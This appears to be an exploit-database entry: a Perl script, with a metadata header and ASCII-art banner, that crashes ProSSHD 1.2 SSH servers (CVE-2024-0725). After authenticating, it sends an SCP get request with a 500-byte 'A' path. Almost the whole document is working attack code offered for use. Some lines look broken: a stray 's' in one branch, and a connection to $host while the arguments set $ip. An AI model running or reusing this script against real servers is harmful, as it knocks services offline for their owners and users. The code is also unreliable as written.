# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS) # Google Dork: N/A # Date: 13 january 2024 # Exploit Author: Fernando Mengali # Vendor Homepage: https://prosshd.com/ # Software Link: N/A # Version: 1.2 20090726 # Tested on: Windows XP # CVE: CVE-2024-0725 $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else {s $cmd="clear"; } system("$cmd"); intro(); main(); print "\t ==> Connecting to webserver... \n\n"; sleep(1); my $i=0; print "\t ==> Exploiting... \n\n"; my $payload = "\x41" x 500; $connection2 = Net::SSH2->new(); $connection2->connect($host, $port) || die "\nError: Connection Refused!\n"; $connection2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; $scpget = $connection2->scp_get($payload); $connection2->disconnect(); print "\t ==> Done! Exploited!"; sub intro { print q { ,--, _ ___/ /\| ,;'( )__, ) ~ // // '--; ' \ | ^ ^ ^ [+] ProSSHD 1.2 20090726 - Denial of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port, $username, $password) = @ARGV; unless (defined($ip) && defined($port)) { print "\n\tUsage: $0 \n"; exit(-1); } }